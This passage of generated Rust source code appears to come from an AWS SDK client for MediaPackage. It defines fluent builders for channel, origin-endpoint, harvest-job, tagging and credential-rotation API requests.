/// - [`max_results(i32)`](crate::client::fluent_builders::ListOriginEndpoints::max_results) / [`set_max_results(i32)`](crate::client::fluent_builders::ListOriginEndpoints::set_max_results): The upper bound on the number of records to return.
/// - [`next_token(impl Into<String>)`](crate::client::fluent_builders::ListOriginEndpoints::next_token) / [`set_next_token(Option<String>)`](crate::client::fluent_builders::ListOriginEndpoints::set_next_token): A token used to resume pagination from the end of a previous request.
/// - On success, responds with [`ListOriginEndpointsOutput`](crate::output::ListOriginEndpointsOutput) with field(s):
/// - [`next_token(Option<String>)`](crate::output::ListOriginEndpointsOutput::next_token): A token that can be used to resume pagination from the end of the collection.
/// - [`origin_endpoints(Option<Vec<OriginEndpoint>>)`](crate::output::ListOriginEndpointsOutput::origin_endpoints): A list of OriginEndpoint records.
/// - On failure, responds with [`SdkError<ListOriginEndpointsError>`](crate::error::ListOriginEndpointsError)
pub fn list_origin_endpoints(&self) -> fluent_builders::ListOriginEndpoints {
fluent_builders::ListOriginEndpoints::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`ListTagsForResource`](crate::client::fluent_builders::ListTagsForResource) operation.
///
/// - The fluent builder is configurable:
/// - [`resource_arn(impl Into<String>)`](crate::client::fluent_builders::ListTagsForResource::resource_arn) / [`set_resource_arn(Option<String>)`](crate::client::fluent_builders::ListTagsForResource::set_resource_arn): (undocumented)
/// - On success, responds with [`ListTagsForResourceOutput`](crate::output::ListTagsForResourceOutput) with field(s):
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::ListTagsForResourceOutput::tags): (undocumented)
/// - On failure, responds with [`SdkError<ListTagsForResourceError>`](crate::error::ListTagsForResourceError)
pub fn list_tags_for_resource(&self) -> fluent_builders::ListTagsForResource {
fluent_builders::ListTagsForResource::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`RotateChannelCredentials`](crate::client::fluent_builders::RotateChannelCredentials) operation.
///
/// - The fluent builder is configurable:
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::RotateChannelCredentials::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::RotateChannelCredentials::set_id): The ID of the channel to update.
/// - On success, responds with [`RotateChannelCredentialsOutput`](crate::output::RotateChannelCredentialsOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::RotateChannelCredentialsOutput::arn): The Amazon Resource Name (ARN) assigned to the Channel.
/// - [`description(Option<String>)`](crate::output::RotateChannelCredentialsOutput::description): A short text description of the Channel.
/// - [`egress_access_logs(Option<EgressAccessLogs>)`](crate::output::RotateChannelCredentialsOutput::egress_access_logs): Configure egress access logging. | /// - [`tags(Option<HashMap<String, String>>)`](crate::output::RotateChannelCredentialsOutput::tags): A collection of tags associated with a resource
/// - On failure, responds with [`SdkError<RotateChannelCredentialsError>`](crate::error::RotateChannelCredentialsError)
pub fn rotate_channel_credentials(&self) -> fluent_builders::RotateChannelCredentials {
fluent_builders::RotateChannelCredentials::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`RotateIngestEndpointCredentials`](crate::client::fluent_builders::RotateIngestEndpointCredentials) operation.
///
/// - The fluent builder is configurable:
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::RotateIngestEndpointCredentials::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::RotateIngestEndpointCredentials::set_id): The ID of the channel the IngestEndpoint is on.
/// - [`ingest_endpoint_id(impl Into<String>)`](crate::client::fluent_builders::RotateIngestEndpointCredentials::ingest_endpoint_id) / [`set_ingest_endpoint_id(Option<String>)`](crate::client::fluent_builders::RotateIngestEndpointCredentials::set_ingest_endpoint_id): The id of the IngestEndpoint whose credentials should be rotated
/// - On success, responds with [`RotateIngestEndpointCredentialsOutput`](crate::output::RotateIngestEndpointCredentialsOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::RotateIngestEndpointCredentialsOutput::arn): The Amazon Resource Name (ARN) assigned to the Channel.
/// - [`description(Option<String>)`](crate::output::RotateIngestEndpointCredentialsOutput::description): A short text description of the Channel.
/// - [`egress_access_logs(Option<EgressAccessLogs>)`](crate::output::RotateIngestEndpointCredentialsOutput::egress_access_logs): Configure egress access logging.
/// - [`hls_ingest(Option<HlsIngest>)`](crate::output::RotateIngestEndpointCredentialsOutput::hls_ingest): An HTTP Live Streaming (HLS) ingest resource configuration.
/// - [`id(Option<String>)`](crate::output::RotateIngestEndpointCredentialsOutput::id): The ID of the Channel.
/// - [`ingress_access_logs(Option<IngressAccessLogs>)`](crate::output::RotateIngestEndpointCredentialsOutput::ingress_access_logs): Configure ingress access logging.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::RotateIngestEndpointCredentialsOutput::tags): A collection of tags associated with a resource
/// - On failure, responds with [`SdkError<RotateIngestEndpointCredentialsError>`](crate::error::RotateIngestEndpointCredentialsError)
pub fn rotate_ingest_endpoint_credentials(
&self,
) -> fluent_builders::RotateIngestEndpointCredentials {
fluent_builders::RotateIngestEndpointCredentials::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`TagResource`](crate::client::fluent_builders::TagResource) operation.
///
/// - The fluent builder is configurable:
/// - [`resource_arn(impl Into<String>)`](crate::client::fluent_builders::TagResource::resource_arn) / [`set_resource_arn(Option<String>)`](crate::client::fluent_builders::TagResource::set_resource_arn): (undocumented)
/// - [`tags(HashMap<String, String>)`](crate::client::fluent_builders::TagResource::tags) / [`set_tags(Option<HashMap<String, String>>)`](crate::client::fluent_builders::TagResource::set_tags): (undocumented)
/// - On success, responds with [`TagResourceOutput`](crate::output::TagResourceOutput)
/// - On failure, responds with [`SdkError<TagResourceError>`](crate::error::TagResourceError)
pub fn tag_resource(&self) -> fluent_builders::TagResource {
fluent_builders::TagResource::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`UntagResource`](crate::client::fluent_builders::UntagResource) operation.
///
/// - The fluent builder is configurable:
/// - [`resource_arn(impl Into<String>)`](crate::client::fluent_builders::UntagResource::resource_arn) / [`set_resource_arn(Option<String>)`](crate::client::fluent_builders::UntagResource::set_resource_arn): (undocumented)
/// - [`tag_keys(Vec<String>)`](crate::client::fluent_builders::UntagResource::tag_keys) / [`set_tag_keys(Option<Vec<String>>)`](crate::client::fluent_builders::UntagResource::set_tag_keys): The key(s) of tag to be deleted
/// - On success, responds with [`UntagResourceOutput`](crate::output::UntagResourceOutput)
/// - On failure, responds with [`SdkError<UntagResourceError>`](crate::error::UntagResourceError)
pub fn untag_resource(&self) -> fluent_builders::UntagResource {
fluent_builders::UntagResource::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`UpdateChannel`](crate::client::fluent_builders::UpdateChannel) operation.
///
/// - The fluent builder is configurable:
/// - [`description(impl Into<String>)`](crate::client::fluent_builders::UpdateChannel::description) / [`set_description(Option<String>)`](crate::client::fluent_builders::UpdateChannel::set_description): A short text description of the Channel.
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::UpdateChannel::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::UpdateChannel::set_id): The ID of the Channel to update.
/// - On success, responds with [`UpdateChannelOutput`](crate::output::UpdateChannelOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::UpdateChannelOutput::arn): The Amazon Resource Name (ARN) assigned to the Channel.
/// - [`description(Option<String>)`](crate::output::UpdateChannelOutput::description): A short text description of the Channel.
/// - [`egress_access_logs(Option<EgressAccessLogs>)`](crate::output::UpdateChannelOutput::egress_access_logs): Configure egress access logging.
/// - [`hls_ingest(Option<HlsIngest>)`](crate::output::UpdateChannelOutput::hls_ingest): An HTTP Live Streaming (HLS) ingest resource configuration.
/// - [`id(Option<String>)`](crate::output::UpdateChannelOutput::id): The ID of the Channel.
/// - [`ingress_access_logs(Option<IngressAccessLogs>)`](crate::output::UpdateChannelOutput::ingress_access_logs): Configure ingress access logging.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::UpdateChannelOutput::tags): A collection of tags associated with a resource
/// - On failure, responds with [`SdkError<UpdateChannelError>`](crate::error::UpdateChannelError)
pub fn update_channel(&self) -> fluent_builders::UpdateChannel {
fluent_builders::UpdateChannel::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`UpdateOriginEndpoint`](crate::client::fluent_builders::UpdateOriginEndpoint) operation.
///
/// - The fluent builder is configurable:
/// - [`authorization(Authorization)`](crate::client::fluent_builders::UpdateOriginEndpoint::authorization) / [`set_authorization(Option<Authorization>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_authorization): CDN Authorization credentials
/// - [`cmaf_package(CmafPackageCreateOrUpdateParameters)`](crate::client::fluent_builders::UpdateOriginEndpoint::cmaf_package) / [`set_cmaf_package(Option<CmafPackageCreateOrUpdateParameters>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_cmaf_package): A Common Media Application Format (CMAF) packaging configuration.
/// - [`dash_package(DashPackage)`](crate::client::fluent_builders::UpdateOriginEndpoint::dash_package) / [`set_dash_package(Option<DashPackage>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_dash_package): A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
/// - [`description(impl Into<String>)`](crate::client::fluent_builders::UpdateOriginEndpoint::description) / [`set_description(Option<String>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_description): A short text description of the OriginEndpoint.
/// - [`hls_package(HlsPackage)`](crate::client::fluent_builders::UpdateOriginEndpoint::hls_package) / [`set_hls_package(Option<HlsPackage>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_hls_package): An HTTP Live Streaming (HLS) packaging configuration.
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::UpdateOriginEndpoint::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_id): The ID of the OriginEndpoint to update.
/// - [`manifest_name(impl Into<String>)`](crate::client::fluent_builders::UpdateOriginEndpoint::manifest_name) / [`set_manifest_name(Option<String>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_manifest_name): A short string that will be appended to the end of the Endpoint URL.
/// - [`mss_package(MssPackage)`](crate::client::fluent_builders::UpdateOriginEndpoint::mss_package) / [`set_mss_package(Option<MssPackage>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_mss_package): A Microsoft Smooth Streaming (MSS) packaging configuration.
/// - [`origination(Origination)`](crate::client::fluent_builders::UpdateOriginEndpoint::origination) / [`set_origination(Option<Origination>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_origination): Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may by requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination
/// - [`startover_window_seconds(i32)`](crate::client::fluent_builders::UpdateOriginEndpoint::startover_window_seconds) / [`set_startover_window_seconds(i32)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_startover_window_seconds): Maximum duration (in seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
/// - [`time_delay_seconds(i32)`](crate::client::fluent_builders::UpdateOriginEndpoint::time_delay_seconds) / [`set_time_delay_seconds(i32)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_time_delay_seconds): Amount of delay (in seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
/// - [`whitelist(Vec<String>)`](crate::client::fluent_builders::UpdateOriginEndpoint::whitelist) / [`set_whitelist(Option<Vec<String>>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_whitelist): A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
/// - On success, responds with [`UpdateOriginEndpointOutput`](crate::output::UpdateOriginEndpointOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::UpdateOriginEndpointOutput::arn): The Amazon Resource Name (ARN) assigned to the OriginEndpoint.
/// - [`authorization(Option<Authorization>)`](crate::output::UpdateOriginEndpointOutput::authorization): CDN Authorization credentials
/// - [`channel_id(Option<String>)`](crate::output::UpdateOriginEndpointOutput::channel_id): The ID of the Channel the OriginEndpoint is associated with.
/// - [`cmaf_package(Option<CmafPackage>)`](crate::output::UpdateOriginEndpointOutput::cmaf_package): A Common Media Application Format (CMAF) packaging configuration.
/// - [`dash_package(Option<DashPackage>)`](crate::output::UpdateOriginEndpointOutput::dash_package): A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
/// - [`description(Option<String>)`](crate::output::UpdateOriginEndpointOutput::description): A short text description of the OriginEndpoint.
/// - [`hls_package(Option<HlsPackage>)`](crate::output::UpdateOriginEndpointOutput::hls_package): An HTTP Live Streaming (HLS) packaging configuration.
/// - [`id(Option<String>)`](crate::output::UpdateOriginEndpointOutput::id): The ID of the OriginEndpoint.
/// - [`manifest_name(Option<String>)`](crate::output::UpdateOriginEndpointOutput::manifest_name): A short string appended to the end of the OriginEndpoint URL.
/// - [`mss_package(Option<MssPackage>)`](crate::output::UpdateOriginEndpointOutput::mss_package): A Microsoft Smooth Streaming (MSS) packaging configuration.
/// - [`origination(Option<Origination>)`](crate::output::UpdateOriginEndpointOutput::origination): Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may by requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination
/// - [`startover_window_seconds(i32)`](crate::output::UpdateOriginEndpointOutput::startover_window_seconds): Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::UpdateOriginEndpointOutput::tags): A collection of tags associated with a resource
/// - [`time_delay_seconds(i32)`](crate::output::UpdateOriginEndpointOutput::time_delay_seconds): Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
/// - [`url(Option<String>)`](crate::output::UpdateOriginEndpointOutput::url): The URL of the packaged OriginEndpoint for consumption.
/// - [`whitelist(Option<Vec<String>>)`](crate::output::UpdateOriginEndpointOutput::whitelist): A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
/// - On failure, responds with [`SdkError<UpdateOriginEndpointError>`](crate::error::UpdateOriginEndpointError)
pub fn update_origin_endpoint(&self) -> fluent_builders::UpdateOriginEndpoint {
fluent_builders::UpdateOriginEndpoint::new(self.handle.clone())
}
}
pub mod fluent_builders {
//!
//! Utilities to ergonomically construct a request to the service.
//!
//! Fluent builders are created through the [`Client`](crate::client::Client) by calling
//! one if its operation methods. After parameters are set using the builder methods,
//! the `send` method can be called to initiate the request.
//!
/// Fluent builder constructing a request to `ConfigureLogs`.
///
/// Changes the Channel's properities to configure log subscription
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct ConfigureLogs {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::configure_logs_input::Builder,
}
impl ConfigureLogs {
/// Creates a new `ConfigureLogs`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::ConfigureLogsOutput,
aws_smithy_http::result::SdkError<crate::error::ConfigureLogsError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// Configure egress access logging.
pub fn egress_access_logs(mut self, input: crate::model::EgressAccessLogs) -> Self {
self.inner = self.inner.egress_access_logs(input);
self
}
/// Configure egress access logging.
pub fn set_egress_access_logs(
mut self,
input: std::option::Option<crate::model::EgressAccessLogs>,
) -> Self {
self.inner = self.inner.set_egress_access_logs(input);
self
}
/// The ID of the channel to log subscription.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the channel to log subscription.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
/// Configure ingress access logging.
pub fn ingress_access_logs(mut self, input: crate::model::IngressAccessLogs) -> Self {
self.inner = self.inner.ingress_access_logs(input);
self
}
/// Configure ingress access logging.
pub fn set_ingress_access_logs(
mut self,
input: std::option::Option<crate::model::IngressAccessLogs>,
) -> Self {
self.inner = self.inner.set_ingress_access_logs(input);
self
}
}
/// Fluent builder constructing a request to `CreateChannel`.
///
/// Creates a new Channel.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct CreateChannel {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::create_channel_input::Builder,
}
impl CreateChannel {
/// Creates a new `CreateChannel`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::CreateChannelOutput,
aws_smithy_http::result::SdkError<crate::error::CreateChannelError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// A short text description of the Channel.
pub fn description(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.description(input.into());
self
}
/// A short text description of the Channel.
pub fn set_description(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_description(input);
self
}
/// The ID of the Channel. The ID must be unique within the region and it cannot be changed after a Channel is created.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the Channel. The ID must be unique within the region and it cannot be changed after a Channel is created.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
/// Adds a key-value pair to `Tags`.
///
/// To override the contents of this collection use [`set_tags`](Self::set_tags).
///
/// A collection of tags associated with a resource
pub fn tags(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
self.inner = self.inner.tags(k.into(), v.into());
self
}
/// A collection of tags associated with a resource
pub fn set_tags(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.inner = self.inner.set_tags(input);
self
}
}
/// Fluent builder constructing a request to `CreateHarvestJob`.
///
/// Creates a new HarvestJob record.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct CreateHarvestJob {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::create_harvest_job_input::Builder,
}
impl CreateHarvestJob {
/// Creates a new `CreateHarvestJob`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::CreateHarvestJobOutput,
aws_smithy_http::result::SdkError<crate::error::CreateHarvestJobError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The end of the time-window which will be harvested
pub fn end_time(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.end_time(input.into());
self
}
/// The end of the time-window which will be harvested
pub fn set_end_time(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_end_time(input);
self
}
/// The ID of the HarvestJob. The ID must be unique within the region and it cannot be changed after the HarvestJob is submitted
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the HarvestJob. The ID must be unique within the region and it cannot be changed after the HarvestJob is submitted
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
/// The ID of the OriginEndpoint that the HarvestJob will harvest from. This cannot be changed after the HarvestJob is submitted.
pub fn origin_endpoint_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.origin_endpoint_id(input.into());
self
}
/// The ID of the OriginEndpoint that the HarvestJob will harvest from. This cannot be changed after the HarvestJob is submitted.
pub fn set_origin_endpoint_id(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_origin_endpoint_id(input);
self
}
/// Configuration parameters for where in an S3 bucket to place the harvested content
pub fn s3_destination(mut self, input: crate::model::S3Destination) -> Self {
self.inner = self.inner.s3_destination(input);
self
}
/// Configuration parameters for where in an S3 bucket to place the harvested content
pub fn set_s3_destination(
mut self,
input: std::option::Option<crate::model::S3Destination>,
) -> Self {
self.inner = self.inner.set_s3_destination(input);
self
}
/// The start of the time-window which will be harvested
pub fn start_time(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.start_time(input.into());
self
}
/// The start of the time-window which will be harvested
pub fn set_start_time(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_start_time(input);
self
}
}
/// Fluent builder constructing a request to `CreateOriginEndpoint`.
///
/// Creates a new OriginEndpoint record.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct CreateOriginEndpoint {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::create_origin_endpoint_input::Builder,
}
impl CreateOriginEndpoint {
/// Creates a new `CreateOriginEndpoint`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::CreateOriginEndpointOutput,
aws_smithy_http::result::SdkError<crate::error::CreateOriginEndpointError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// CDN Authorization credentials
pub fn authorization(mut self, input: crate::model::Authorization) -> Self {
self.inner = self.inner.authorization(input);
self
}
/// CDN Authorization credentials
pub fn set_authorization(
mut self,
input: std::option::Option<crate::model::Authorization>,
) -> Self {
self.inner = self.inner.set_authorization(input);
self
}
/// The ID of the Channel that the OriginEndpoint will be associated with. This cannot be changed after the OriginEndpoint is created.
pub fn channel_id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.channel_id(input.into());
self
}
/// The ID of the Channel that the OriginEndpoint will be associated with. This cannot be changed after the OriginEndpoint is created.
pub fn set_channel_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_channel_id(input);
self
}
/// A Common Media Application Format (CMAF) packaging configuration.
pub fn cmaf_package(
mut self,
input: crate::model::CmafPackageCreateOrUpdateParameters,
) -> Self {
self.inner = self.inner.cmaf_package(input);
self
}
/// A Common Media Application Format (CMAF) packaging configuration.
pub fn set_cmaf_package(
mut self,
input: std::option::Option<crate::model::CmafPackageCreateOrUpdateParameters>,
) -> Self {
self.inner = self.inner.set_cmaf_package(input);
self
}
/// A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
pub fn dash_package(mut self, input: crate::model::DashPackage) -> Self {
self.inner = self.inner.dash_package(input);
self
}
/// A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
pub fn set_dash_package(
mut self,
input: std::option::Option<crate::model::DashPackage>,
) -> Self {
self.inner = self.inner.set_dash_package(input);
self
}
/// A short text description of the OriginEndpoint.
pub fn description(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.description(input.into());
self
}
/// A short text description of the OriginEndpoint.
pub fn set_description(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_description(input);
self
}
/// An HTTP Live Streaming (HLS) packaging configuration.
pub fn hls_package(mut self, input: crate::model::HlsPackage) -> Self {
self.inner = self.inner.hls_package(input);
self
}
/// An HTTP Live Streaming (HLS) packaging configuration.
pub fn set_hls_package(
mut self,
input: std::option::Option<crate::model::HlsPackage>,
) -> Self {
self.inner = self.inner.set_hls_package(input);
self
}
/// The ID of the OriginEndpoint. The ID must be unique within the region and it cannot be changed after the OriginEndpoint is created.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
/// The ID of the OriginEndpoint. The ID must be unique within the region and it cannot be changed after the OriginEndpoint is created.
pub fn set_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.inner = self.inner.set_id(input);
self
}
/// A short string that will be used as the filename of the OriginEndpoint URL (defaults to "index").
pub fn manifest_name(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.manifest_name(input.into());
self
}
/// A short string that will be used as the filename of the OriginEndpoint URL (defaults to "index").
pub fn set_manifest_name(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.inner = self.inner.set_manifest_name(input);
self
}
/// A Microsoft Smooth Streaming (MSS) packaging configuration.
pub fn mss_package(mut self, input: crate::model::MssPackage) -> Self {
self.inner = self.inner.mss_package(input);
self
}
/// A Microsoft Smooth Streaming (MSS) packaging configuration.
pub fn set_mss_package(
mut self,
input: std::option::Option<crate::model::MssPackage>,
) -> Self {
self.inner = self.inner.set_mss_package(input);
self
}
/// Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may by requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination
pub fn origination(mut self, input: crate::model::Origination) -> Self {
self.inner = self.inner.origination(input);
self
}
/// Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may by requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination
pub fn set_origination(
mut self,
input: std::option::Option<crate::model::Origination>,
) -> Self {
self.inner = self.inner.set_origination(input);
self
}
/// Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
pub fn startover_window_seconds(mut self, input: i32) -> Self {
self.inner = self.inner.startover_window_seconds(input);
self
}
/// Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
pub fn set_startover_window_seconds(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_startover_window_seconds(input);
self
}
/// Adds a key-value pair to `Tags`.
///
/// To override the contents of this collection use [`set_tags`](Self::set_tags).
///
/// A collection of tags associated with a resource
pub fn tags(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
self.inner = self.inner.tags(k.into(), v.into());
self
}
/// A collection of tags associated with a resource
pub fn set_tags(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.inner = self.inner.set_tags(input);
self
}
/// Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
pub fn time_delay_seconds(mut self, input: i32) -> Self {
self.inner = self.inner.time_delay_seconds(input);
self
}
/// Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
pub fn set_time_delay_seconds(mut self, input: std::option::Option<i32>) -> Self {
self.inner = self.inner.set_time_delay_seconds(input);
self
}
/// Appends an item to `Whitelist`.
///
/// To override the contents of this collection use [`set_whitelist`](Self::set_whitelist).
///
/// A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
pub fn whitelist(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.whitelist(input.into());
self
}
/// A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
pub fn set_whitelist(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.inner = self.inner.set_whitelist(input);
self
}
}
/// Fluent builder constructing a request to `DeleteChannel`.
///
/// Deletes an existing Channel.
#[derive(std::clone::Clone, std::fmt::Debug)]
pub struct DeleteChannel {
handle: std::sync::Arc<super::Handle>,
inner: crate::input::delete_channel_input::Builder,
}
impl DeleteChannel {
/// Creates a new `DeleteChannel`.
pub(crate) fn new(handle: std::sync::Arc<super::Handle>) -> Self {
Self {
handle,
inner: Default::default(),
}
}
/// Sends the request and returns the response.
///
/// If an error occurs, an `SdkError` will be returned with additional details that
/// can be matched against.
///
/// By default, any retryable failures will be retried twice. Retry behavior
/// is configurable with the [RetryConfig](aws_smithy_types::retry::RetryConfig), which can be
/// set when configuring the client.
pub async fn send(
self,
) -> std::result::Result<
crate::output::DeleteChannelOutput,
aws_smithy_http::result::SdkError<crate::error::DeleteChannelError>,
> {
let op = self
.inner
.build()
.map_err(|err| aws_smithy_http::result::SdkError::ConstructionFailure(err.into()))?
.make_operation(&self.handle.conf)
.await
.map_err(|err| {
aws_smithy_http::result::SdkError::ConstructionFailure(err.into())
})?;
self.handle.client.call(op).await
}
/// The ID of the Channel to delete.
pub fn id(mut self, input: impl Into<std::string::String>) -> Self {
self.inner = self.inner.id(input.into());
self
}
